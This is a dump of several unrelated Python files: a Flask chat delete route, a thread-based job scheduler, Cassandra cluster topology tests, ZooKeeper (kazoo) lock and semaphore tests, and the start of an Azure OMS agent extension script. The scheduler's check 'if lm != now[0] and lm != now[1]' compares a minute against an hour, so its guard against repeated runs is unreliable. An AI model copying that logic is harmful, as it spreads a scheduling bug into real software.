return render_template('chat/_profile_card.html', user=user)
@chat_bp.route('/message/delete/<message_id>', methods=['DELETE'])
def delete_message(message_id):
message = Message.query.get_or_404(message_id)
if current_user != message.author and not current_user.is_admin:
abort(403)
db.session.delete(message)
db.session.commit()
return '', 204
|
scheduler.py |
import time
from datetime import datetime
from threading import Thread
class Scheduler:
def __init__(self, timezone : int = 0, granularity : int = 30):
self.scheduled = {}
self.running = True
self.thread = None
self.timezone = timezone
self.granularity = granularity
def add(self, ID, time, job):
self.scheduled[ID] = (time, job)
def remove(self, ID):
if ID in self.scheduled:
self.scheduled.pop(ID)
def stop(self):
self.running = False
if self.thread is not None:
self.thread.join()
self.thread = None
def run(self):
self.running = True
self.thread = Thread(target=self._run)
self.thread.start()
def get_time(self):
now = self.now()
return '{}:{}'.format(now[0], str(now[1]).rjust(2, '0'))
def now(self):
t = datetime.now().time()
return ((t.hour + self.timezone) % 24, t.minute)
def _run(self):
last = (-1, -1)
while self.running:
now = self.now()
lh, lm = last
if lm != now[0] and lm != now[1]:
for ID, entry in self.scheduled.items():
t, job = entry
h, m = t
if now[0] == h and now[1] == m:
job(ID)
last = (now[0], now[1])
# sleep for x seconds
time.sleep(self.granularity)
|
topology_test.py | import re
import time
import pytest
import logging
from threading import Thread
from cassandra import ConsistencyLevel
from ccmlib.node import TimeoutError, ToolError
from dtest import Tester, create_ks, create_cf
from tools.assertions import assert_almost_equal, assert_all, assert_none
from tools.data import insert_c1c2, query_c1c2
since = pytest.mark.since
logger = logging.getLogger(__name__)
class TestTopology(Tester):
def test_do_not_join_ring(self):
"""
@jira_ticket CASSANDRA-9034
Check that AssertionError is not thrown on SizeEstimatesRecorder before node joins ring
"""
cluster = self.cluster.populate(1)
node1, = cluster.nodelist()
node1.start(wait_for_binary_proto=True, join_ring=False,
jvm_args=["-Dcassandra.size_recorder_interval=1"])
# initial delay is 30s
time.sleep(40)
node1.stop(gently=False)
@since('3.0.11')
def test_size_estimates_multidc(self):
"""
Test that primary ranges are correctly generated on
system.size_estimates for multi-dc, multi-ks scenario
@jira_ticket CASSANDRA-9639
"""
logger.debug("Creating cluster")
cluster = self.cluster
cluster.set_configuration_options(values={'num_tokens': 2})
cluster.populate([2, 1])
node1_1, node1_2, node2_1 = cluster.nodelist()
logger.debug("Setting tokens")
node1_tokens, node2_tokens, node3_tokens = ['-6639341390736545756,-2688160409776496397',
'-2506475074448728501,8473270337963525440',
'-3736333188524231709,8673615181726552074']
node1_1.set_configuration_options(values={'initial_token': node1_tokens})
node1_2.set_configuration_options(values={'initial_token': node2_tokens})
node2_1.set_configuration_options(values={'initial_token': node3_tokens})
cluster.set_configuration_options(values={'num_tokens': 2})
logger.debug("Starting cluster")
cluster.start()
out, _, _ = node1_1.nodetool('ring')
logger.debug("Nodetool ring output {}".format(out))
logger.debug("Creating keyspaces")
session = self.patient_cql_connection(node1_1)
create_ks(session, 'ks1', 3)
create_ks(session, 'ks2', {'dc1': 2})
create_cf(session, 'ks1.cf1', columns={'c1': 'text', 'c2': 'text'})
create_cf(session, 'ks2.cf2', columns={'c1': 'text', 'c2': 'text'})
logger.debug("Refreshing size estimates")
node1_1.nodetool('refreshsizeestimates')
node1_2.nodetool('refreshsizeestimates')
node2_1.nodetool('refreshsizeestimates')
"""
CREATE KEYSPACE ks1 WITH replication =
{'class': 'SimpleStrategy', 'replication_factor': '3'}
CREATE KEYSPACE ks2 WITH replication =
{'class': 'NetworkTopologyStrategy', 'dc1': '2'} AND durable_writes = true;
Datacenter: dc1
==========
Address Token
8473270337963525440
127.0.0.1 -6639341390736545756
127.0.0.1 -2688160409776496397
127.0.0.2 -2506475074448728501
127.0.0.2 8473270337963525440
Datacenter: dc2
==========
Address Token
8673615181726552074
127.0.0.3 -3736333188524231709
127.0.0.3 8673615181726552074
"""
logger.debug("Checking node1_1 size_estimates primary ranges")
session = self.patient_exclusive_cql_connection(node1_1)
assert_all(session, "SELECT range_start, range_end FROM system.size_estimates "
"WHERE keyspace_name = 'ks1'", [['-3736333188524231709', '-2688160409776496397'],
['-9223372036854775808', '-6639341390736545756'],
['8673615181726552074', '-9223372036854775808']])
assert_all(session, "SELECT range_start, range_end FROM system.size_estimates "
"WHERE keyspace_name = 'ks2'", [['-3736333188524231709', '-2688160409776496397'],
['-6639341390736545756', '-3736333188524231709'],
['-9223372036854775808', '-6639341390736545756'],
['8473270337963525440', '8673615181726552074'],
['8673615181726552074', '-9223372036854775808']])
logger.debug("Checking node1_2 size_estimates primary ranges")
session = self.patient_exclusive_cql_connection(node1_2)
assert_all(session, "SELECT range_start, range_end FROM system.size_estimates "
"WHERE keyspace_name = 'ks1'", [['-2506475074448728501', '8473270337963525440'],
['-2688160409776496397', '-2506475074448728501']])
assert_all(session, "SELECT range_start, range_end FROM system.size_estimates "
"WHERE keyspace_name = 'ks2'", [['-2506475074448728501', '8473270337963525440'],
['-2688160409776496397', '-2506475074448728501']])
logger.debug("Checking node2_1 size_estimates primary ranges")
session = self.patient_exclusive_cql_connection(node2_1)
assert_all(session, "SELECT range_start, range_end FROM system.size_estimates "
"WHERE keyspace_name = 'ks1'", [['-6639341390736545756', '-3736333188524231709'],
['8473270337963525440', '8673615181726552074']])
assert_none(session, "SELECT range_start, range_end FROM system.size_estimates "
"WHERE keyspace_name = 'ks2'")
def test_simple_decommission(self):
"""
@jira_ticket CASSANDRA-9912
Check that AssertionError is not thrown on SizeEstimatesRecorder after node is decommissioned
"""
cluster = self.cluster
cluster.populate(3)
cluster.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.size_recorder_interval=1"])
node1, node2, node3 = cluster.nodelist()
session = self.patient_cql_connection(node1)
if cluster.version() >= '2.2':
# reduce system_distributed RF to 2 so we don't require forceful decommission
session.execute("ALTER KEYSPACE system_distributed WITH REPLICATION = {'class':'SimpleStrategy', 'replication_factor':'2'};")
# write some data
node1.stress(['write', 'n=10K', 'no-warmup', '-rate', 'threads=8'])
# Decommission node and wipe its data
node2.decommission()
node2.stop()
# This sleep is here to give the cluster time to hit the AssertionError
# described in 9912. Do not remove it.
time.sleep(10)
@pytest.mark.skip(reason='Hangs on CI for 2.1')
def test_concurrent_decommission_not_allowed(self):
"""
Test concurrent decommission is not allowed
"""
cluster = self.cluster
cluster.set_configuration_options(values={'stream_throughput_outbound_megabits_per_sec': 1})
cluster.populate(2).start(wait_other_notice=True)
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node2)
create_ks(session, 'ks', 1)
create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'})
insert_c1c2(session, n=10000, consistency=ConsistencyLevel.ALL)
mark = node2.mark_log()
def decommission():
node2.nodetool('decommission')
# Launch first decommission in a external thread
t = Thread(target=decommission)
t.start()
# Make sure first decommission is initialized before second decommission
node2.watch_log_for('DECOMMISSIONING', filename='debug.log')
# Launch a second decommission, should fail
with pytest.raises(ToolError):
node2.nodetool('decommission')
# Check data is correctly forwarded to node1 after node2 is decommissioned
t.join()
node2.watch_log_for('DECOMMISSIONED', from_mark=mark)
session = self.patient_cql_connection(node1)
session.execute('USE ks')
for n in range(0, 10000):
query_c1c2(session, n, ConsistencyLevel.ONE)
@since('3.10')
def test_resumable_decommission(self):
"""
@jira_ticket CASSANDRA-12008
Test decommission operation is resumable
"""
self.fixture_dtest_setup.ignore_log_patterns = [r'Streaming error occurred',
r'Error while decommissioning node',
r'Remote peer 127.0.0.2 failed stream session',
r'Remote peer 127.0.0.2:7000 failed stream session']
cluster = self.cluster
cluster.set_configuration_options(values={'stream_throughput_outbound_megabits_per_sec': 1})
cluster.populate(3, install_byteman=True).start(wait_other_notice=True)
node1, node2, node3 = cluster.nodelist()
session = self.patient_cql_connection(node2)
# reduce system_distributed RF to 2 so we don't require forceful decommission
session.execute("ALTER KEYSPACE system_distributed WITH REPLICATION = {'class':'SimpleStrategy', 'replication_factor':'2'};")
create_ks(session, 'ks', 2)
create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'})
insert_c1c2(session, n=10000, consistency=ConsistencyLevel.ALL)
# Execute first rebuild, should fail
with pytest.raises(ToolError):
if cluster.version() >= '4.0':
script = ['./byteman/4.0/decommission_failure_inject.btm']
else:
script = ['./byteman/pre4.0/decommission_failure_inject.btm']
node2.byteman_submit(script)
node2.nodetool('decommission')
# Make sure previous ToolError is due to decommission
node2.watch_log_for('Error while decommissioning node')
# Decommission again
mark = node2.mark_log()
node2.nodetool('decommission')
# Check decommision is done and we skipped transfereed ranges
node2.watch_log_for('DECOMMISSIONED', from_mark=mark)
node2.grep_log("Skipping transferred range .* of keyspace ks, endpoint {}".format(node2.address_for_current_version_slashy()), filename='debug.log')
# Check data is correctly forwarded to node1 and node3
cluster.remove(node2)
node3.stop(gently=False)
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
for i in range(0, 10000):
query_c1c2(session, i, ConsistencyLevel.ONE)
node1.stop(gently=False)
node3.start()
session.shutdown()
mark = node3.mark_log()
node3.watch_log_for('Starting listening for CQL clients', from_mark=mark)
session = self.patient_exclusive_cql_connection(node3)
session.execute('USE ks')
for i in range(0, 10000):
query_c1c2(session, i, ConsistencyLevel.ONE)
@pytest.mark.no_vnodes
def test_movement(self):
cluster = self.cluster
# Create an unbalanced ring
cluster.populate(3, tokens=[0, 2**48, 2**62]).start()
node1, node2, node3 = cluster.nodelist()
session = self.patient_cql_connection(node1)
create_ks(session, 'ks', 1)
create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'})
insert_c1c2(session, n=30000, consistency=ConsistencyLevel.ONE)
cluster.flush()
# Move nodes to balance the cluster
def move_node(node, token):
mark = node.mark_log()
node.move(token) # can't assume 0 is balanced with m3p
node.watch_log_for('{} state jump to NORMAL'.format(node.address_for_current_version()), from_mark=mark, timeout=180)
time.sleep(3)
balancing_tokens = cluster.balanced_tokens(3)
move_node(node1, balancing_tokens[0])
move_node(node2, balancing_tokens[1])
move_node(node3, balancing_tokens[2])
time.sleep(1)
cluster.cleanup()
# Check we can get all the keys
for n in range(0, 30000):
query_c1c2(session, n, ConsistencyLevel.ONE)
# Now the load should be basically even
sizes = [node.data_size() for node in [node1, node2, node3]]
assert_almost_equal(sizes[0], sizes[1])
assert_almost_equal(sizes[0], sizes[2])
assert_almost_equal(sizes[1], sizes[2])
@pytest.mark.no_vnodes
def test_decommission(self):
cluster = self.cluster
tokens = cluster.balanced_tokens(4)
cluster.populate(4, tokens=tokens).start()
node1, node2, node3, node4 = cluster.nodelist()
session = self.patient_cql_connection(node1)
create_ks(session, 'ks', 2)
create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'})
insert_c1c2(session, n=30000, consistency=ConsistencyLevel.QUORUM)
cluster.flush()
sizes = [node.data_size() for node in cluster.nodelist() if node.is_running()]
init_size = sizes[0]
assert_almost_equal(*sizes)
time.sleep(.5)
node4.decommission()
node4.stop()
cluster.cleanup()
time.sleep(.5)
# Check we can get all the keys
for n in range(0, 30000):
query_c1c2(session, n, ConsistencyLevel.QUORUM)
sizes = [node.data_size() for node in cluster.nodelist() if node.is_running()]
logger.debug(sizes)
assert_almost_equal(sizes[0], sizes[1])
assert_almost_equal((2.0 / 3.0) * sizes[0], sizes[2])
assert_almost_equal(sizes[2], init_size)
@pytest.mark.no_vnodes
def test_move_single_node(self):
""" Test moving a node in a single-node cluster (#4200) """
cluster = self.cluster
# Create an unbalanced ring
cluster.populate(1, tokens=[0]).start()
node1 = cluster.nodelist()[0]
time.sleep(0.2)
session = self.patient_cql_connection(node1)
create_ks(session, 'ks', 1)
create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'})
insert_c1c2(session, n=10000, consistency=ConsistencyLevel.ONE)
cluster.flush()
node1.move(2**25)
time.sleep(1)
cluster.cleanup()
# Check we can get all the keys
for n in range(0, 10000):
query_c1c2(session, n, ConsistencyLevel.ONE)
@since('3.0')
def test_decommissioned_node_cant_rejoin(self):
"""
@jira_ticket CASSANDRA-8801
Test that a decommissioned node can't rejoin the cluster by:
- creating a cluster,
- decommissioning a node, and
- asserting that the "decommissioned node won't rejoin" error is in the
logs for that node and
- asserting that the node is not running.
"""
rejoin_err = 'This node was decommissioned and will not rejoin the ring'
self.fixture_dtest_setup.ignore_log_patterns = list(self.fixture_dtest_setup.ignore_log_patterns) + [
rejoin_err]
self.cluster.populate(3).start(wait_for_binary_proto=True)
node1, node2, node3 = self.cluster.nodelist()
logger.debug('decommissioning...')
node3.decommission(force=self.cluster.version() >= '4.0')
logger.debug('stopping...')
node3.stop()
logger.debug('attempting restart...')
node3.start(wait_other_notice=False)
try:
# usually takes 3 seconds, so give it a generous 15
node3.watch_log_for(rejoin_err, timeout=15)
except TimeoutError:
# TimeoutError is not very helpful to the reader of the test output;
# let that pass and move on to string assertion below
pass
assert re.search(rejoin_err,
'\n'.join(['\n'.join(err_list) for err_list in node3.grep_log_for_errors()]), re.MULTILINE)
# Give the node some time to shut down once it has detected
# its invalid state. If it doesn't shut down in the 30 seconds,
# consider filing a bug. It shouldn't take more than 10, in most cases.
start = time.time()
while start + 30 > time.time() and node3.is_running():
time.sleep(1)
assert not node3.is_running()
@since('3.0')
def test_crash_during_decommission(self):
"""
If a node crashes whilst another node is being decommissioned,
upon restarting the crashed node should not have invalid entries
for the decommissioned node
@jira_ticket CASSANDRA-10231
"""
cluster = self.cluster
self.fixture_dtest_setup.ignore_log_patterns = [r'Streaming error occurred', 'Stream failed']
cluster.populate(3).start(wait_other_notice=True)
node1, node2 = cluster.nodelist()[0:2]
t = DecommissionInParallel(node1)
t.start()
node1.watch_log_for("DECOMMISSIONING", filename='debug.log')
null_status_pattern = re.compile(".N(?:\s*)127\.0\.0\.1(?:.*)null(?:\s*)rack1")
while t.is_alive():
out = self.show_status(node2)
if null_status_pattern.search(out):
logger.debug("Matched null status entry")
break
logger.debug("Restarting node2")
node2.stop(gently=False)
node2.start(wait_for_binary_proto=True, wait_other_notice=False)
logger.debug("Waiting for decommission to complete")
t.join()
self.show_status(node2)
logger.debug("Sleeping for 30 seconds to allow gossip updates")
time.sleep(30)
out = self.show_status(node2)
assert not null_status_pattern.search(out)
@since('3.12')
@pytest.mark.resource_intensive
def test_stop_decommission_too_few_replicas_multi_dc(self):
"""
Decommission should fail when it would result in the number of live replicas being less than
the replication factor. --force should bypass this requirement.
@jira_ticket CASSANDRA-12510
@expected_errors ToolError when # nodes will drop below configured replicas in NTS/SimpleStrategy
"""
cluster = self.cluster
cluster.populate([2, 2]).start(wait_for_binary_proto=True)
node1, node2, node3, node4 = self.cluster.nodelist()
session = self.patient_cql_connection(node2)
session.execute("ALTER KEYSPACE system_distributed WITH REPLICATION = {'class':'SimpleStrategy', 'replication_factor':'2'};")
create_ks(session, 'ks', {'dc1': 2, 'dc2': 2})
with pytest.raises(ToolError):
node4.nodetool('decommission')
session.execute('DROP KEYSPACE ks')
create_ks(session, 'ks2', 4)
with pytest.raises(ToolError):
node4.nodetool('decommission')
node4.nodetool('decommission --force')
decommissioned = node4.watch_log_for("DECOMMISSIONED", timeout=120)
assert decommissioned, "Node failed to decommission when passed --force"
def show_status(self, node):
out, _, _ = node.nodetool('status')
logger.debug("Status as reported by node {}".format(node.address()))
logger.debug(out)
return out
class DecommissionInParallel(Thread):
def __init__(self, node):
Thread.__init__(self)
self.node = node
def run(self):
node = self.node
mark = node.mark_log()
try:
out, err, _ = node.nodetool("decommission")
node.watch_log_for("DECOMMISSIONED", from_mark=mark)
logger.debug(out)
logger.debug(err)
except ToolError as e:
logger.debug("Decommission failed with exception: " + str(e))
pass
|
test_lock.py | """license: Apache License 2.0, see LICENSE for more details."""
import uuid
import threading
from nose.tools import eq_, ok_
from kazoo.exceptions import CancelledError
from kazoo.exceptions import LockTimeout
from kazoo.testing import KazooTestCase
from kazoo.tests.util import wait
class KazooLockTests(KazooTestCase):
def setUp(self):
super(KazooLockTests, self).setUp()
self.lockpath = "/" + uuid.uuid4().hex
self.condition = threading.Condition()
self.released = threading.Event()
self.active_thread = None
self.cancelled_threads = []
def _thread_lock_acquire_til_event(self, name, lock, event):
try:
with lock:
with self.condition:
eq_(self.active_thread, None)
self.active_thread = name
self.condition.notify_all()
event.wait()
with self.condition:
eq_(self.active_thread, name)
self.active_thread = None
self.condition.notify_all()
self.released.set()
except CancelledError:
with self.condition:
self.cancelled_threads.append(name)
self.condition.notify_all()
def test_lock_one(self):
lock_name = uuid.uuid4().hex
lock = self.client.Lock(self.lockpath, lock_name)
event = threading.Event()
thread = threading.Thread(target=self._thread_lock_acquire_til_event,
args=(lock_name, lock, event))
thread.start()
lock2_name = uuid.uuid4().hex
anotherlock = self.client.Lock(self.lockpath, lock2_name)
# wait for any contender to show up on the lock
wait(anotherlock.contenders)
eq_(anotherlock.contenders(), [lock_name])
with self.condition:
while self.active_thread != lock_name:
self.condition.wait()
# release the lock
event.set()
with self.condition:
while self.active_thread:
self.condition.wait()
self.released.wait()
thread.join()
def test_lock(self):
threads = []
names = ["contender" + str(i) for i in range(5)]
contender_bits = {}
for name in names:
e = threading.Event()
l = self.client.Lock(self.lockpath, name)
t = threading.Thread(target=self._thread_lock_acquire_til_event,
args=(name, l, e))
contender_bits[name] = (t, e)
threads.append(t)
# acquire the lock ourselves first to make the others line up
lock = self.client.Lock(self.lockpath, "test")
lock.acquire()
for t in threads:
t.start()
# wait for everyone to line up on the lock
wait(lambda: len(lock.contenders()) == 6)
contenders = lock.contenders()
eq_(contenders[0], "test")
contenders = contenders[1:]
remaining = list(contenders)
# release the lock and contenders should claim it in order
lock.release()
for contender in contenders:
thread, event = contender_bits[contender]
with self.condition:
while not self.active_thread:
self.condition.wait()
eq_(self.active_thread, contender)
eq_(lock.contenders(), remaining)
remaining = remaining[1:]
event.set()
with self.condition:
while self.active_thread:
self.condition.wait()
for thread in threads:
thread.join()
def test_lock_reconnect(self):
event = threading.Event()
other_lock = self.client.Lock(self.lockpath, 'contender')
thread = threading.Thread(target=self._thread_lock_acquire_til_event,
args=('contender', other_lock, event))
# acquire the lock ourselves first to make the contender line up
lock = self.client.Lock(self.lockpath, "test")
lock.acquire()
thread.start()
# wait for the contender to line up on the lock
wait(lambda: len(lock.contenders()) == 2)
eq_(lock.contenders(), ['test', 'contender'])
self.expire_session()
lock.release()
with self.condition:
while not self.active_thread:
self.condition.wait()
eq_(self.active_thread, 'contender')
event.set()
thread.join()
def test_lock_non_blocking(self):
lock_name = uuid.uuid4().hex
lock = self.client.Lock(self.lockpath, lock_name)
event = threading.Event()
thread = threading.Thread(target=self._thread_lock_acquire_til_event,
args=(lock_name, lock, event))
thread.start()
lock1 = self.client.Lock(self.lockpath, lock_name)
# wait for the thread to acquire the lock
with self.condition:
if not self.active_thread:
self.condition.wait(5)
ok_(not lock1.acquire(blocking=False))
eq_(lock.contenders(), [lock_name]) # just one - itself
event.set()
thread.join()
def test_lock_fail_first_call(self):
event1 = threading.Event()
lock1 = self.client.Lock(self.lockpath, "one")
thread1 = threading.Thread(target=self._thread_lock_acquire_til_event,
args=("one", lock1, event1))
thread1.start()
# wait for this thread to acquire the lock
with self.condition:
if not self.active_thread:
self.condition.wait(5)
eq_(self.active_thread, "one")
eq_(lock1.contenders(), ["one"])
event1.set()
thread1.join()
def test_lock_cancel(self):
event1 = threading.Event()
lock1 = self.client.Lock(self.lockpath, "one")
thread1 = threading.Thread(target=self._thread_lock_acquire_til_event,
args=("one", lock1, event1))
thread1.start()
# wait for this thread to acquire the lock
with self.condition:
if not self.active_thread:
self.condition.wait(5)
eq_(self.active_thread, "one")
client2 = self._get_client()
client2.start()
event2 = threading.Event()
lock2 = client2.Lock(self.lockpath, "two")
thread2 = threading.Thread(target=self._thread_lock_acquire_til_event,
args=("two", lock2, event2))
thread2.start()
# this one should block in acquire. check that it is a contender
wait(lambda: len(lock2.contenders()) > 1)
eq_(lock2.contenders(), ["one", "two"])
lock2.cancel()
with self.condition:
if not "two" in self.cancelled_threads:
self.condition.wait()
assert "two" in self.cancelled_threads
eq_(lock2.contenders(), ["one"])
thread2.join()
event1.set()
thread1.join()
client2.stop()
def test_lock_double_calls(self):
lock1 = self.client.Lock(self.lockpath, "one")
lock1.acquire()
lock1.acquire()
lock1.release()
lock1.release()
def test_lock_reacquire(self):
lock = self.client.Lock(self.lockpath, "one")
lock.acquire()
lock.release()
lock.acquire()
lock.release()
def test_lock_timeout(self):
timeout = 3
e = threading.Event()
started = threading.Event()
# In the background thread, acquire the lock and wait thrice the time
# that the main thread is going to wait to acquire the lock.
lock1 = self.client.Lock(self.lockpath, "one")
def _thread(lock, event, timeout):
with lock:
started.set()
event.wait(timeout)
if not event.isSet():
# Eventually fail to avoid hanging the tests
self.fail("lock2 never timed out")
t = threading.Thread(target=_thread, args=(lock1, e, timeout * 3))
t.start()
# Start the main thread's kazoo client and try to acquire the lock
# but give up after `timeout` seconds
client2 = self._get_client()
client2.start()
started.wait(5)
self.assertTrue(started.isSet())
lock2 = client2.Lock(self.lockpath, "two")
try:
lock2.acquire(timeout=timeout)
except LockTimeout:
# A timeout is the behavior we're expecting, since the background
# thread should still be holding onto the lock
pass
else:
self.fail("Main thread unexpectedly acquired the lock")
finally:
# Cleanup
e.set()
t.join()
client2.stop()
class TestSemaphore(KazooTestCase):
def setUp(self):
super(TestSemaphore, self).setUp()
self.lockpath = "/" + uuid.uuid4().hex
self.condition = threading.Condition()
self.released = threading.Event()
self.active_thread = None
self.cancelled_threads = []
def test_basic(self):
sem1 = self.client.Semaphore(self.lockpath)
sem1.acquire()
sem1.release()
def test_lock_one(self):
sem1 = self.client.Semaphore(self.lockpath, max_leases=1)
sem2 = self.client.Semaphore(self.lockpath, max_leases=1)
started = threading.Event()
event = threading.Event()
sem1.acquire()
def sema_one():
started.set()
with sem2:
event.set()
thread = threading.Thread(target=sema_one, args=())
thread.start()
started.wait(10)
self.assertFalse(event.is_set())
sem1.release()
event.wait(10)
self.assert_(event.is_set())
thread.join()
def test_non_blocking(self):
sem1 = self.client.Semaphore(
self.lockpath, identifier='sem1', max_leases=2)
sem2 = self.client.Semaphore(
self.lockpath, identifier='sem2', max_leases=2)
sem3 = self.client.Semaphore(
self.lockpath, identifier='sem3', max_leases=2)
sem1.acquire()
sem2.acquire()
ok_(not sem3.acquire(blocking=False))
eq_(set(sem1.lease_holders()), set(['sem1', 'sem2']))
sem2.release()
# the next line isn't required, but avoids timing issues in tests
sem3.acquire()
eq_(set(sem1.lease_holders()), set(['sem1', 'sem3']))
sem1.release()
sem3.release()
def test_non_blocking_release(self):
sem1 = self.client.Semaphore(
self.lockpath, identifier='sem1', max_leases=1)
sem2 = self.client.Semaphore(
self.lockpath, identifier='sem2', max_leases=1)
sem1.acquire()
sem2.acquire(blocking=False)
# make sure there's no shutdown / cleanup error
sem1.release()
sem2.release()
def test_holders(self):
started = threading.Event()
event = threading.Event()
def sema_one():
with self.client.Semaphore(self.lockpath, 'fred', max_leases=1):
started.set()
event.wait()
thread = threading.Thread(target=sema_one, args=())
thread.start()
started.wait()
sem1 = self.client.Semaphore(self.lockpath)
holders = sem1.lease_holders()
eq_(holders, ['fred'])
event.set()
thread.join()
def test_semaphore_cancel(self):
sem1 = self.client.Semaphore(self.lockpath, 'fred', max_leases=1)
sem2 = self.client.Semaphore(self.lockpath, 'george', max_leases=1)
sem1.acquire()
started = threading.Event()
event = threading.Event()
def sema_one():
started.set()
try:
with sem2:
started.set()
except CancelledError:
event.set()
thread = threading.Thread(target=sema_one, args=())
thread.start()
started.wait()
eq_(sem1.lease_holders(), ['fred'])
eq_(event.is_set(), False)
sem2.cancel()
event.wait()
eq_(event.is_set(), True)
thread.join()
def test_multiple_acquire_and_release(self):
sem1 = self.client.Semaphore(self.lockpath, 'fred', max_leases=1)
sem1.acquire()
sem1.acquire()
eq_(True, sem1.release())
eq_(False, sem1.release())
def test_handle_session_loss(self):
expire_semaphore = self.client.Semaphore(self.lockpath, 'fred',
max_leases=1)
client = self._get_client()
client.start()
lh_semaphore = client.Semaphore(self.lockpath, 'george', max_leases=1)
lh_semaphore.acquire()
started = threading.Event()
event = threading.Event()
event2 = threading.Event()
def sema_one():
started.set()
with expire_semaphore:
event.set()
event2.wait()
thread = threading.Thread(target=sema_one, args=())
thread.start()
started.wait()
eq_(lh_semaphore.lease_holders(), ['george'])
# Fired in a separate thread to make sure we can see the effect
expired = threading.Event()
def expire():
self.expire_session()
expired.set()
thread = threading.Thread(target=expire, args=())
thread.start()
expire_semaphore.wake_event.wait()
expired.wait()
lh_semaphore.release()
client.stop()
event.wait(5)
eq_(expire_semaphore.lease_holders(), ['fred'])
event2.set()
thread.join()
def test_inconsistent_max_leases(self):
sem1 = self.client.Semaphore(self.lockpath, max_leases=1)
sem2 = self.client.Semaphore(self.lockpath, max_leases=2)
sem1.acquire()
self.assertRaises(ValueError, sem2.acquire)
def test_inconsistent_max_leases_other_data(self):
sem1 = self.client.Semaphore(self.lockpath, max_leases=1)
sem2 = self.client.Semaphore(self.lockpath, max_leases=2)
self.client.ensure_path(self.lockpath)
self.client.set(self.lockpath, b'a$')
sem1.acquire()
# sem2 thinks it's ok to have two lease holders
ok_(sem2.acquire(blocking=False))
def test_reacquire(self):
lock = self.client.Semaphore(self.lockpath)
lock.acquire()
lock.release()
lock.acquire()
lock.release()
def test_acquire_after_cancelled(self):
lock = self.client.Semaphore(self.lockpath)
self.assertTrue(lock.acquire())
self.assertTrue(lock.release())
lock.cancel()
self.assertTrue(lock.cancelled)
self.assertTrue(lock.acquire())
def test_timeout(self):
timeout = 3
e = threading.Event()
started = threading.Event()
# In the background thread, acquire the lock and wait thrice the time
# that the main thread is going to wait to acquire the lock.
sem1 = self.client.Semaphore(self.lockpath, "one")
def _thread(sem, event, timeout):
with sem:
started.set()
event.wait(timeout)
if not event.isSet():
# Eventually fail to avoid hanging the tests
self.fail("sem2 never timed out")
t = threading.Thread(target=_thread, args=(sem1, e, timeout * 3))
t.start()
# Start the main thread's kazoo client and try to acquire the lock
# but give up after `timeout` seconds
client2 = self._get_client()
client2.start()
started.wait(5)
self.assertTrue(started.isSet())
sem2 = client2.Semaphore(self.lockpath, "two")
try:
sem2.acquire(timeout=timeout)
except LockTimeout:
# A timeout is the behavior we're expecting, since the background
# thread will still be holding onto the lock
e.set()
finally:
# Cleanup
t.join()
client2.stop()
|
omsagent.py | #!/usr/bin/env python
#
# OmsAgentForLinux Extension
#
# Copyright 2015 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import sys
# future imports have no effect on python 3 (verified in official docs)
# importing from source causes import errors on python 3, lets skip import
if sys.version_info[0] < 3:
from future import standard_library
standard_library.install_aliases()
from builtins import str
import os
import os.path
import signal
import pwd
import grp
import re
import traceback
import time
import platform
import subprocess
import json
import base64
import inspect
import urllib.request, urllib.parse, urllib.error
import watcherutil
import shutil
from threading import Thread
try:
from Utils.WAAgentUtil import waagent
import Utils.HandlerUtil as HUtil
except Exception as e:
# These utils have checks around the use of them; this is not an exit case
print('Importing utils failed with error: {0}'.format(e))
# This monkey patch duplicates the one made in the waagent import above.
# It is necessary because on 2.6, the waagent monkey patch appears to be overridden
# by the python-future subprocess.check_output backport.
if sys.version_info < (2,7):
def check_output(*popenargs, **kwargs):
r"""Backport from subprocess module from python 2.7"""
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
raise subprocess.CalledProcessError(retcode, cmd, output=output)
return output
# Exception classes used by this module.
class CalledProcessError(Exception):
def __init__(self, returncode, cmd, output=None):
self.returncode = returncode
self.cmd = cmd
self.output = output
def __str__(self):
return "Command '%s' returned non-zero exit status %d" % (self.cmd, self.returncode)
subprocess.check_output = check_output
subprocess.CalledProcessError = CalledProcessError
# Global Variables
ProceedOnSigningVerificationFailure = True
PackagesDirectory = 'packages'
keysDirectory = 'keys'
BundleFileName = 'omsagent-1.13.11-0.universal.x64.sh'
GUIDRegex = r'[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}'
GUIDOnlyRegex = r'^' + GUIDRegex + '$'
SCOMCertIssuerRegex = r'^[\s]*Issuer:[\s]*CN=SCX-Certificate/title=SCX' + GUIDRegex + ', DC=.*$'
SCOMPort = 1270
PostOnboardingSleepSeconds = 5
InitialRetrySleepSeconds = 30
IsUpgrade = False
# Paths
OMSAdminPath = '/opt/microsoft/omsagent/bin/omsadmin.sh'
OMSAgentServiceScript = '/opt/microsoft/omsagent/bin/service_control'
OMIConfigEditorPath = '/opt/omi/bin/omiconfigeditor'
OMIServerConfPath = '/etc/opt/omi/conf/omiserver.conf'
EtcOMSAgentPath = '/etc/opt/microsoft/omsagent/'
VarOMSAgentPath = '/var/opt/microsoft/omsagent/'
SCOMCertPath = '/etc/opt/microsoft/scx/ssl/scx.pem'
ExtensionStateSubdirectory = 'state'
# Commands
# Always use upgrade - will handle install if scx, omi are not installed or upgrade if they are.
InstallCommandTemplate = '{0} --upgrade'
UninstallCommandTemplate = '{0} --remove'
WorkspaceCheckCommand = '{0} -l'.format(OMSAdminPath)
OnboardCommandWithOptionalParams = '{0} -w {1} -s {2} {3}'
